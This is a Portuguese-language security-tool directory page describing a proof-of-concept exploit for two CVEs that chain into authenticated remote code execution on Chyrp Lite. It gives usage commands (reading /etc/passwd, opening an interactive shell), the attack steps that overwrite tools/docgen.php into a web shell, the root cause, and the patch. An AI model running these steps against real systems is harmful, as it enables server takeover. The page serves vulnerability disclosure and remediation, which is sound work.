Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
chyrp-lite-rce-poc — CVE-2026-53767 + CVE-2026-53768 - RCE autenticado em Chyrp Lite ≤ 2026.01 via bypass da blocklist de uploads_path e ausência de validação de extensão | Kitploit
Ferramentas/GitHubGitHub/iltosec/chyrp-lite-rce-poc
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebPós-ExploraçãoSegurança WebAprendizado e EducaçãoDesenvolvimento de Payloads
GitHubiltosec/chyrp-lite-rce-poc

chyrp-lite-rce-poc

CVE-2026-53767 + CVE-2026-53768 - RCE autenticado em Chyrp Lite ≤ 2026.01 via bypass da blocklist de uploads_path e ausência de validação de extensão

Ver Repositório
há 2 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

chyrp-lite-rce-poc

CVE-2026-53767 + CVE-2026-53768 - RCE autenticado no Chyrp Lite ≤ 2026.01 ("Iriomote")

Ataque encadeado: bypass da blocklist de uploads_path (CVE-2026-53768) + ausência de validação de extensão de arquivo em admin_update_upload() (CVE-2026-53767) → Execução Remota de Código como www-data


Visão Geral

O Chyrp Lite ≤ 2026.01 é vulnerável a uma cadeia de Execução Remota de Código autenticada, explorável por qualquer usuário que possua as permissões change_settings e edit_upload (padrão: Administrador).

CVECVE-2026-53767 · CVE-2026-53768
CVSS9.1 Crítico (AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H)
Afetadoxenocrat/chyrp-lite ≤ 2026.01
Corrigidocommit 1489dc9
Avisos de segurançaGHSA-8h86-c24h-5jp3 · GHSA-r9w7-5h94-wq5x
Relatoriltosec

Uso

root@kitploit:~
python chyrp_rce_poc.py -h

usage: chyrp_rce_poc.py [-h] -u URL -U USERNAME -P PASSWORD [-c CMD] [-i]
                         [--config CONFIG] [--restore RESTORE]

Execução padrão de reconhecimento

root@kitploit:~
python chyrp_rce_poc.py -u http://127.0.0.1/chyrp -U admin -P 'fJ945@5:3s8v+X:'   
imagem

Comando único

root@kitploit:~
python chyrp_rce_poc.py -u http://127.0.0.1/chyrp -U admin -P 'fJ945@5:3s8v+X:' -c 'cat /etc/passwd'
imagem

Shell interativo

root@kitploit:~
python chyrp_rce_poc.py -u http://127.0.0.1/chyrp -U admin -P 'fJ945@5:3s8v+X:' -i
imagem

Cadeia de ataque

Etapa 1 - Autenticar

Etapa 2 - Redirecionar uploads_path para tools/ (não está na blocklist)

imagem

imagem

Etapa 3 - Sobrescrever tools/docgen.php (sem verificação de extensão na substituição)

imagem

imagem

Etapa 4 - Executar

http://127.0.0.1/chyrp/tools/docgen.php?cmd=id

imagem

CVE-2026-53768 - Blocklist incompleta de uploads_path

includes/controller/Admin.php valida uploads_path contra uma blocklist fixa no código:

root@kitploit:~
admin | ajax | feathers | fonts | includes | modules | themes

O diretório tools/ - que acompanha o Chyrp Lite e contém arquivos .php executáveis (docgen.php, gettext.php, triggers.php) - não está listado. Enviar uploads_path=tools passa na validação e é persistido em config.json.php.

CVE-2026-53767 - Ausência de validação de extensão em admin_update_upload()

upload_tester() (includes/helpers.php) apenas verifica o código de erro do upload PHP e o tamanho do arquivo - ele não realiza nenhuma validação de extensão no arquivo de substituição. O nome do arquivo de destino é obtido de $_POST['file'] e resolvido em relação ao uploads_path atual. Como tools/docgen.php já existe (satisfazendo a verificação is_file()), ele é silenciosamente sobrescrito com conteúdo arbitrário.


Nota: A flag --config aponta para config.json.php para o cálculo do token CSRF. Se o arquivo não for legível localmente, o script recorre automaticamente à extração do token a partir da resposta HTML.


Requisitos

  • Python 3.x (apenas stdlib - sem dependências externas)
  • Credenciais de administrador para a instância do Chyrp Lite alvo

Correção

Atualize para uma versão que contenha o commit 1489dc9 ou posterior.

Duas correções independentes foram aplicadas:

Correção 1 - Adicionar tools (e licenses) à blocklist de uploads_path:

root@kitploit:~
// Before
"/^$qdir((admin|ajax|feathers|fonts|includes|modules|themes)$qdir|$)/"

// After
"/^$qdir((admin|ajax|feathers|fonts|includes|licenses|modules|themes|tools)$qdir|$)/"

Correção 2 - Validar a extensão do arquivo enviado contra a whitelist em admin_update_upload():

root@kitploit:~
$new_extension = strtolower(pathinfo($_FILES['upload']['name'], PATHINFO_EXTENSION));
$whitelist = upload_filter_whitelist();
if (!in_array($new_extension, $whitelist))
    error(__("Error"), __("File type is not allowed."), code: 422);

Referências

  • GHSA-8h86-c24h-5jp3 - Ausência de validação de extensão
  • GHSA-r9w7-5h94-wq5x - Blocklist incompleta
  • Commit de correção 1489dc9
  • iltosec.com - Análise completa

Aviso legal

Este PoC é disponibilizado apenas para fins educacionais e de pesquisa. Utilize-o somente contra sistemas que você possua ou para os quais tenha permissão explícita por escrito para testar. O autor não se responsabiliza por qualquer uso indevido.

Baixar ferramenta